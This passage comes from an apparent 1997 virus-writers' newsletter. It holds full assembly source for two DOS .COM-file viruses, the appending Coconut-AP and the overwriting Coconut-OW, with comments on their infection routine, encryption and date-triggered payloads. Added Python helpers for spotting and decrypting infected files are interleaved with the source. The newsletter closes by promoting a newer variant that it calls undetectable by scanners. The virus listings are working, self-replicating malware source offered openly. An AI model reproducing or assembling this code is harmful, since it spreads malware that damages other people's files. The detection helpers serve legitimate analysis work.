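def constructed_infected(host):
    """Lay out a file the way the listing describes an infected one:
    JMP near to where the body will start, the 'IN' marker, the untouched
    host tail, then a body of the right length (zeros here, not virus code).
    The original first five bytes would live inside the real body."""
    prefix = b"\xE9" + struct.pack("<H", len(host) - 3) + SIGNATURE
    return prefix + host[5:] + b"\x00" * VIRUS_BODY_LEN


def coconut_ap_check(data):
    """Classify a COM image: 'clean', 'marker-only' (signature present but
    the jump does not land at an appended 074Eh-byte body, so probably a
    different variant or a coincidence), or 'infected'."""
    n = len(data)
    if n < 5 or data[0] != 0xE9 or data[3:5] != SIGNATURE:
        return "clean"
    rel = struct.unpack_from("<H", data, 1)[0]
    jump_target = (COM_LOAD + 3 + rel) & 0xFFFF   # address after the 3-byte JMP
    body_start = COM_LOAD + n - VIRUS_BODY_LEN    # where an appended body sits
    if jump_target == body_start:
        return "infected"
    return "marker-only"


def original_length(data):
    """For a file classified 'infected', the host's pre-infection size."""
    return len(data) - VIRUS_BODY_LEN


if __name__ == "__main__":
    host = constructed_com()
    sample = constructed_infected(host)
    print("clean host      :", coconut_ap_check(host))
    print("constructed case:", coconut_ap_check(sample),
          "- original length", original_length(sample))
```

The same two-step pattern, marker plus structural cross-check, is how a scanner keeps a byte-string signature from firing on every COM program that happens to begin with a jump. Note that the header's size window (128 to 60000 bytes) applies to the host at infection time, so it bounds `original_length`, not the size of the file being scanned.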
; ------------------------------------------------------------------------
; THE COCONUT-AP! VIRUS
; (analysis: dooMSday)
;
; * direct action com-file infector (only if 128 < filesize < 60000 bytes
; and if filename is not '??MM????.COM' --> no COMMAND.COM infection)
; * tries to infect two files each time an infected file is executed
; * no date/time change
; * encrypted
; * debugger trap
; * activation date: Dec. 25th / Dec. 31st --> displays message
; * able to change directory (".." method)
; * signature "IN" at offset 0103h
; * virus author: @King Lizard
; ------------------------------------------------------------------------
.MODEL TINY
.RADIX 16
.CODE
ORG 100
START:
JMP VIR_ENTRY
DB 49,4E
;-------- original program code -----------
;
db 79 dup (90)
INT 20
;------------------------------------------
VIR_ENTRY:
CALL GET_IP
GET_IP:
MOV AX,4C00
SUB AH,22 ;AX=2Ah
INT 21 ;get Date
POP BP
PUSH DX
SUB BP,0108 ;BP=007Bh
CALL DECODE
POP DX
CMP DH,0C ;month=Dec. ?
JNZ LAB_02
CMP DL,19 ;day=25 ?
JZ LAB_01
CMP DL,1F ;day=31 ?
JNZ LAB_02
LAB_01:
CALL PAYLOAD
LAB_02:
CALL NEW_VECTOR
CALL RESTORE_BYTES
CALL PROC_2
CALL PROC_3
FIND_FIRST:
MOV AH,4Dh
INC AH ;AH=4Eh
MOV CX,0007
LEA DX,[BP+07EDh] ;(COM_STRING)
INT 21 ;Find First
JNB LAB_06
JMP LAB_05
LAB_07:
JMP LAB_03
LAB_06:
; file= '??MM????.COM' ?
CMP WORD PTR DS:[BP+08B3],4D4Dh
JZ LAB_07
;file length:
CMP WORD PTR DS:[BP+08ADh],0080
JB LAB_07 ; < 128 Bytes !
CMP WORD PTR DS:[BP+08ADh],60EA
JA LAB_07 ; > 60000 Bytes !
LEA DX,[BP+08B1]
MOV AX,4C00
SUB AX,08FF ;AX=4301h
SUB CX,CX
INT 21 ;set attrib.
JB LAB_07
MOV AX,4C00
SUB AX,0EFE ;AX=3D02h
LEA DX,[BP+08B1]
INT 21 ;open file
JB LAB_07
XCHG BX,AX ;BX=handle
MOV CX,0005
MOV AH,3F ;read file
LEA DX,[BP+0845] ;[ORIGINAL_BYTES]
INT 21
CMP WORD PTR DS:[BP+0848],4E49 ;signature ?
JZ LAB_07
CALL MOVE_POINTER
SUB AX,0003
MOV DS:[BP+0841],AX ;[P_JUMP+1]
MOV AX,4200 ;move file pointer
CWD
SUB CX,CX
INT 21
MOV CX,0005
MOV AH,3F
INC AH ;AH=40h
LEA DX,[BP+0840] ;(P_JUMP)
INT 21 ;write file
CALL MOVE_POINTER
CALL NEW_KEY
CALL ENCODE
MOV CX,074E
MOV AH,3F
INC AH ;AH=40h
LEA DX,[BP+0105] ;(VIR_ENTRY)
INT 21 ;write file
CALL DECODE
CALL PROC_4
LAB_05:
INC BYTE PTR DS:[BP+084F] ;[U_K]
CMP BYTE PTR DS:[BP+084F],02 ;[U_K]
JNZ LAB_03
MOV AX,4C00
SUB AH,32 ;AH=1Ah
MOV DX,0080
INT 21 ;set DTA Adr.
MOV AH,3Bh ;set directory
LEA DX,[BP+0852] ;(P_DIRECTORY)
INT 21
CALL RESTORE_VECTOR
MOV BX,0101
DEC BX
JMP BX ;Jump 0100
LAB_03:
CALL PROC_4
MOV AH,50
DEC AH ;AH=4Fh
INT 21 ;find next
JB LAB_04
JMP LAB_06
LAB_04:
MOV AH,3Bh ;set directory
LEA DX,[BP+084A] ;(PARENT_DIR)
INT 21
JB LAB_05
JMP FIND_FIRST
MOVE_POINTER:
MOV AX,4202 ;move file pointer
CWD
SUB CX,CX
INT 3
RET
NEW_VECTOR:
CLI
PUSH DS
XOR AX,AX
MOV DS,AX ;DS=0000h
MOV AX,word ptr[offset start-00F4] ;get Int 03h offset
;and save it
MOV CS:[BP+083C],AX ;[INT_3_OFFSET]
MOV AX,word ptr[offset start-00F2] ;get Int 03h segment
;and save it
MOV CS:[BP+083E],AX ;[INT_3_SEGMENT]
MOV AX,word ptr[offset start-007C] ;get Int 21h offset
MOV word ptr[offset start-00F4],AX ;copy to Int 3 offset
MOV AX,word ptr[offset start-007A] ;get Int 21h segment
MOV word ptr[offset start-00F2],AX ;copy to Int 3 segment
POP DS
STI
RET
RESTORE_BYTES:
LEA SI,[BP+0845] ;[ORIGINAL_BYTES]
MOV DI,0100
MOVSW
MOVSW
MOVSB
RET
PROC_2:
MOV BYTE PTR DS:[BP+084F],00
RET
PROC_3:
MOV AH,47 ;get directory
SUB DL,DL
LEA SI,[BP+0853] ;(P_DIRECTORY +1)
INT 3
MOV AH,1A ;set DTA adr.
LEA DX,[BP+0893] ;(P_DIRECTORY +65d)
INT 3
RET
RESTORE_VECTOR:
CLI
PUSH DS
XOR AX,AX
MOV DS,AX
MOV AX,CS:[BP+083C] ;[INT_3_OFFSET]
MOV word ptr[offset start-00F4],AX ;=000Ch
MOV AX,CS:[BP+083E] ;[INT_3_SEGMENT]
MOV word ptr[offset start-00F2],AX ;=000Eh
POP DS
STI
RET
NEW_KEY:
MOV AH,2C ;get time
INT 3
CMP DX,+00
JZ NEW_KEY
MOV DS:[BP+0850],DX ;[P_KEY]
RET
PROC_4:
SUB CX,CX
MOV CL,DS:[BP+08A8]
LEA DX,[BP+08B1]
MOV AX,4301 ;set attrib.
INT 3
MOV CX,DS:[BP+08A9]
MOV DX,DS:[BP+08ABh]
MOV AX,5701 ;set file date/time
INT 3
MOV AH,3E ;close file
INT 3
RET
PAYLOAD:
SUB CX,CX
MOV DX,314F
MOV BX,0700
MOV AX,0600 ;CLS
INT 10
MOV AH,05 ;activate screen page 0
INT 10
MOV AX,1112 ;8*8
SUB BL,BL
INT 10
MOV AH,12 ;?
MOV BL,20
INT 10
MOV AH,09 ;display String
LEA DX,[BP+02EDh] ;(MESSAGE)
INT 21
INT 20 ;exit
RET
;------------------------------------------- DATA
AUTHOR DB '[by @King Lizard]'
MESSAGE DB 0Dh,0A, ' ooooo@@@@@@@@@@@@@ooooo'
DB 0Dh,0A, ' oo@@@@@@@@@@@@@@@@@@@@@@@@@oo'
DB 0Dh,0A, ' oo@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@oo'
DB 0Dh,0A, ' o@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@o'
DB 0Dh,0A, ' o@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@o'
DB 0Dh,0A, ' o@@@@@@@@@ @@@@@@@@@@@ @@@@@@@@@@o'
DB 0Dh,0A, ' @@@@@@@@@@@ @@@@@@@@@@@ @@@@@@@@@@@@'
DB 0Dh,0A, ' @@@@@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@@@@@@'
DB 0Dh,0A, '@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'
DB 0Dh,0A, '@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@'
DB 0Dh,0A, '@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@'
DB 0Dh,0A, ' @@@@ "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@" o@@@'
DB 0Dh,0A, ' @@@o """@@@@@@@@@@@@@@@@@@@@@@""" o@@@'
DB 0Dh,0A, ' @@@o "@@@"@@@@@@"@@@" o@@@'
DB 0Dh,0A, ' @@@@o @ @ o@@@"'
DB 0Dh,0A, ' "@@@@o o@@@@'
DB 0Dh,0A, ' "@@@@@o @ @ o@@@@@"'
DB 0Dh,0A, ' ""@@@@@o@@@oooooooo@@@o@@@@@""'
DB 0Dh,0A, ' ""@@@@@@@@@@@@@@@@@@@@""'
DB 0Dh,0A, ' ""@@@@@@@@@@@@@""'
DB 0Dh,0A, ' '
DB 0Dh,0A, ' * *'
DB 0Dh,0A, ' *** ***'
DB 0Dh,0A, ' ***** Virus coconut wishes you a merry *****'
DB 0Dh,0A, '******* christmas and a happy new year!! *******'
DB 0Dh,0A, ' * *'
DB 0Dh,0A, ' * *'
DB 0Dh,0A,'$'
;
COM_STRING DB '*.COM',0
;
ENCODE:
CALL PROC_1
LAB_ENCODE_01:
CMP WORD PTR DS:[BP+084Dh],+01 ;[P_COUNT]
DEC WORD PTR DS:[BP+084Dh] ;[P_COUNT]
JB LAB_08
LODSW
ROR AX,CL
XOR AX,CX
ADD AX,CX
STOSW
JMP LAB_ENCODE_01
LAB_08:
RET
PROC_1:
MOV WORD PTR DS:[BP+084Dh],02EC ;[P_COUNT]
LEA SI,[BP+021Bh] ;(MOVE_POINTER)
MOV CX,DS:[BP+0850] ;[P_KEY]
MOV DI,SI
RET
DECODE:
CALL PROC_1
LAB_DECODE_01:
CMP WORD PTR DS:[BP+084Dh],+01 ;[P_COUNT]
DEC WORD PTR DS:[BP+084Dh] ;[P_COUNT]
JB LAB_09
LODSW
SUB AX,CX
XOR AX,CX
ROL AX,CL
STOSW
JMP LAB_DECODE_01
LAB_09:
RET
;
INT_3_OFFSET DB 0F4,06
INT_3_SEGMENT DB 70,00
P_JUMP DB 0E9,7Dh,00
SIGNATURE DB 49,4E
ORIGINAL_BYTES DB 90,90,90,90,90
PARENT_DIR DB '..',0
P_COUNT DB 0FF,0FF
U_K DB 01
P_KEY DB 00,00
P_DIRECTORY DB '\'
;------------------
; XXXX:08CE Directory Puffer
; XXXX:090E New_DTA_Adr
;
; 090E reserved
; 0923 attrib.
; 0924 time
; 0926 date
; 0928 file length (low)
; 092A file length (high)
; 092C file name
;
And here is the Coconut-OW! virus:
; -------------------------------------------------------------
; The COCONUT-OW! virus (Coconut.1323)
; (analysis by DooMSday)
; =============================================================
; * direct action, overwriting com-file infector
; * activation date: August 31st ---> displays message
; * no date/time change
; * encrypted
; * tries to infect all files in the current directory
; * contains a bug (?) (see EOF)
; * virus author: The King Lizard
; ------------------------------------------------------------------------
.MODEL TINY
.RADIX 16
.CODE
ORG 100
START:
CALL DECODE
JMP short LAB_01
PROC_02:
CALL NEW_KEY
MOV DX,009E
CALL ENCODE
MOV AX,4300 ;read file attribute
INT 01
MOV [ATTRIBUTE],CX
XOR CX,CX
MOV AX,4301 ;set file attribute
INT 01
MOV AX,3D02 ;open file: read/write
INT 01
JB PAYLOAD
XCHG BX,AX
MOV AX,5700 ;get file date/time
INT 01
MOV [FILE_DATE],DX ;and save
MOV [FILE_TIME],CX
MOV DX,0100
MOV AH,40 ;write file
MOV CX,052Bh
INT 01
MOV AX,5701 ;set file date/time
MOV CX,[FILE_TIME]
MOV DX,[FILE_DATE]
INT 01
MOV AH,3E ;close file
INT 01
MOV DX,009E
MOV CX,[ATTRIBUTE]
MOV AX,4301 ;set file attribute
INT 01
CALL DECODE
RET
LAB_01:
CLI ;set Int 01h-vector
PUSH DS ;to Int 21h-routine
XOR AX,AX
MOV DS,AX
MOV AX,word ptr[offset start-0FC] ;[0004]
MOV CS:[INT_01_OFFSET],AX
MOV AX,word ptr[offset start-0FA] ;[0006]
MOV CS:[INT_01_SEGMENT],AX
MOV AX,word ptr[offset start-7C] ;[0084]
MOV word ptr[offset start-0FC],AX ;[0004]
MOV AX,word ptr[offset start-7A] ;[0086]
MOV word ptr[offset start-0FA],AX ;[0006]
POP DS
STI
MOV DX,01D9 ;offset (FILE)
MOV AH,4E ;find first
MOV CX,0007
INT 01
JNB LAB_02
JMP short PAYLOAD
LAB_02:
CALL PROC_02
MOV DX,0080
MOV AH,4F ;find next
INT 01
JNB LAB_03
JMP short PAYLOAD
LAB_03:
JMP short LAB_02
PAYLOAD:
MOV AH,2A ;get date
INT 01
CMP DH,08 ;month=8 ?
JNZ LAB_PAYLOAD_1
CMP DL,1F ;day=31 ?
JNZ LAB_PAYLOAD_1
MOV AH,09 ;display string
MOV DX,0202 ;offset (MESSAGE)
INT 01
LAB_PAYLOAD_1:
CLI
PUSH DS
XOR AX,AX
MOV DS,AX
MOV AX,CS:[INT_01_OFFSET]
MOV word ptr[offset start-0FC],AX ;[0004]
MOV AX,CS:[INT_01_SEGMENT]
MOV word ptr[offset start-0FA],AX ;[0006]
POP DS
STI
INT 20 ;exit to DOS
NEW_KEY:
MOV AH,2C ;get time
INT 01
CMP DX,+00
JZ NEW_KEY
MOV [KEY],DX
RET
;
FILE db '*.COM',0
INFO db '[Virus coconut, by The King Lizard]'
;
MESSAGE DB 0Dh,0A,' ooooo@@@@@@@@@@@@@ooooo'
DB 0Dh,0A,' oo@@@@@@@@@@@@@@@@@@@@@@@@@oo'
DB 0Dh,0A,' oo@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@oo'
DB 0Dh,0A,' o@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@o'
DB 0Dh,0A,' o@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@o'
DB 0Dh,0A,' o@@@@@@@@@ @@@@@@@@@@@ @@@@@@@@@@o'
DB 0Dh,0A,' @@@@@@@@@@@ @@@@@@@@@@@ @@@@@@@@@@@@'
DB 0Dh,0A,' @@@@@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@@@@@@'
DB 0Dh,0A,'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'
DB 0Dh,0A,'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'
DB 0Dh,0A,'@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@'
DB 0Dh,0A,'@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@'
DB 0Dh,0A,' @@@@ "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@" o@@@'
DB 0Dh,0A,' @@@o """@@@@@@@@@@@@@@@@@@@@@@""" o@@@'
DB 0Dh,0A,' @@@o "@@@"@@@@@@"@@@" o@@@'
DB 0Dh,0A,' @@@@o @ @ o@@@"'
DB 0Dh,0A,' "@@@@o o@@@@'
DB 0Dh,0A,' "@@@@@o o@@@@@"'
DB 0Dh,0A,' ""@@@@@oooooooooooooooo@@@@@""'
DB 0Dh,0A,' ""@@@@@@@@@@@@@@@@@@@@""'
DB 0Dh,0A,' ""@@@@@@@@@@@@@""'
DB 0Dh,0A,'$'
;
DB 0,0 ;?
COUNT dw 0
KEY dw 0
;
FILE_DATE dw 0
FILE_TIME dw 0
ATTRIBUTE dw 0
;
INT_01_OFFSET dw 0
INT_01_SEGMENT dw 0
ENCODE:
CALL PROC_01
LAB_ENCODE_01:
CMP WORD PTR [COUNT],+00
JZ LAB_ENCODE_02
LODSW
ROR AX,CL
XOR AX,CX
ADD AX,CX
STOSW
DEC WORD PTR [COUNT]
JMP short LAB_ENCODE_01
LAB_ENCODE_02:
RET
PROC_01:
MOV WORD PTR [COUNT],023E
MOV SI,015E
MOV CX,[KEY]
MOV DI,SI
RET
DECODE:
CALL PROC_01
LAB_DECODE_1:
CMP WORD PTR [COUNT],+00
JZ LAB_DECODE_2
LODSW
SUB AX,CX
XOR AX,CX
ROL AX,CL
STOSW
DEC WORD PTR [COUNT]
JMP short LAB_DECODE_1
LAB_DECODE_2:
INT 3 ;BUG! (shouldn't it be "RET" ?)
END START
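Both listings above use the same two tricks an analyst has to get past: a self-recognition marker (the appending variant writes `E9 lo hi` followed by the bytes 49h,4Eh, i.e. 'IN', over the host's first five bytes and skips any file that already has 'IN' at offset 3) and a per-infection word cipher (`ROR AX,CL` / `XOR AX,CX` / `ADD AX,CX` with CX = the stored key, undone by `SUB` / `XOR` / `ROL`). The following Python is an added example for the scanning side, not code from the newsletter or from the virus author: it flags a .COM image carrying the 'IN' marker and recovers the encrypted region once the stored key has been read out, so the author string becomes searchable. The sample key, the constructed "infected" prefix and the constructed plaintext are all assumptions made up for the demonstration; `encode_body()` is the forward transform and is only used here to build that fixture.

```python
"""Coconut (1997, DOS .COM infector) analysis helpers: marker scan and
body decryption.  Added example; not part of the newsletter."""
import struct

MARKER = b"IN"          # 49h 4Eh, checked at file offset 3 by the virus
JMP_REL16 = 0xE9        # opcode of the JMP the virus writes at offset 0


def _ror16(value: int, count: int) -> int:
    """16-bit rotate right; on an 8086 a count of n rotates n mod 16 times."""
    count %= 16
    return ((value >> count) | (value << (16 - count))) & 0xFFFF


def _rol16(value: int, count: int) -> int:
    """16-bit rotate left, the inverse of _ror16 for the same count."""
    count %= 16
    return ((value << count) | (value >> (16 - count))) & 0xFFFF


def encode_body(plain: bytes, key: int) -> bytes:
    """Forward transform from the ENCODE routine (ROR, XOR, ADD per word).
    Used here only to build a test fixture for decode_body()."""
    if len(plain) % 2:
        raise ValueError("the cipher works on whole little-endian 16-bit words")
    key &= 0xFFFF
    out = bytearray()
    for (word,) in struct.iter_unpack("<H", plain):
        word = _ror16(word, key & 0xFF)       # ROR AX,CL
        word ^= key                           # XOR AX,CX
        word = (word + key) & 0xFFFF          # ADD AX,CX
        out += struct.pack("<H", word)
    return bytes(out)


def decode_body(cipher: bytes, key: int) -> bytes:
    """Inverse transform from the DECODE routine (SUB, XOR, ROL per word).
    This is what an analyst runs on the encrypted region after reading
    the 16-bit key the virus stores in clear next to its decoder."""
    if len(cipher) % 2:
        raise ValueError("the cipher works on whole little-endian 16-bit words")
    key &= 0xFFFF
    out = bytearray()
    for (word,) in struct.iter_unpack("<H", cipher):
        word = (word - key) & 0xFFFF          # SUB AX,CX
        word ^= key                           # XOR AX,CX
        word = _rol16(word, key & 0xFF)       # ROL AX,CL
        out += struct.pack("<H", word)
    return bytes(out)


def has_coconut_marker(com_image: bytes) -> bool:
    """True when the image starts with JMP rel16 and carries 'IN' at offset 3,
    the prefix the appending variant writes over an infected host."""
    return (len(com_image) >= 5
            and com_image[0] == JMP_REL16
            and com_image[3:5] == MARKER)


def contains_author_string(encrypted_body: bytes, key: int) -> bool:
    """Decrypt the body with the recovered key and look for the author tag
    both listings embed (it is inside the encrypted region, so it is not
    visible in the raw file)."""
    return b"King Lizard" in decode_body(encrypted_body, key)


# ---- constructed fixture (assumptions, not data from a real sample) ----
SAMPLE_KEY = 0x1A2B                               # NEW_KEY stores a non-zero time word
SAMPLE_PLAIN = b"[by @King Lizard]" + b"\x00"     # padded to an even length
SAMPLE_BODY = encode_body(SAMPLE_PLAIN, SAMPLE_KEY)
INFECTED_HEAD = bytes([JMP_REL16, 0x7D, 0x00]) + MARKER + b"\x90" * 11
CLEAN_HEAD = b"\xb4\x09\xba\x0e\x01\xcd\x21\xcd\x20"   # ordinary tiny .COM prologue

if __name__ == "__main__":
    print("infected prefix flagged:", has_coconut_marker(INFECTED_HEAD))
    print("clean prefix flagged:   ", has_coconut_marker(CLEAN_HEAD))
    print("decrypted body:         ", decode_body(SAMPLE_BODY, SAMPLE_KEY))
    print("author tag found:       ", contains_author_string(SAMPLE_BODY, SAMPLE_KEY))
```

The marker check is cheap enough to run over a whole directory of .COM files, and because the virus itself relies on the marker to avoid double infection, every file it has touched carries it. The rotation count is taken modulo 16 because that is how both the 8086 (which rotates the full count) and later CPUs (which mask the count to 5 bits) end up behaving for a 16-bit operand.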
----------------------------------------------
And for those who just cannot wait for more of the coconut family,
be sure to head on over to Virus Heaven for the newest addition to the
family, the COCONUT-2099 virus. It is an appending, non-resident infector
with double encryption, an int 24h handler, anti-tracing, keyboard blocking
and dot-dot directory search, and it hooks int 03h. It does not infect .EXE
files under 1k or files over 500k, and it does not infect .COM files that
have been renamed to .EXE. Its payload is inoffensive, and it is currently
(March 5, 1997) undetectable by commercial virus scanners.
=============================================================================
SECTION - 9
The End
Well, so another issue of the Virus Heaven Newsletter comes to a close. I
expect that you guys will leave me alone for a week or two before hounding
me about when issue #4 will be out. I will admit this one took a while to
get out; hell, I have been working on it since before Christmas. But
I have a few ideas for articles. I may even be doing some research for
this next one, but that is all I will say for now. And of course, as always,
if you write an article, send it in. I do have one request though:
please don't send me any more TROJAN handbooks and tutorials. This was it;
I wanna at least keep this thing as focused as a passed-out drunkard on the
curb.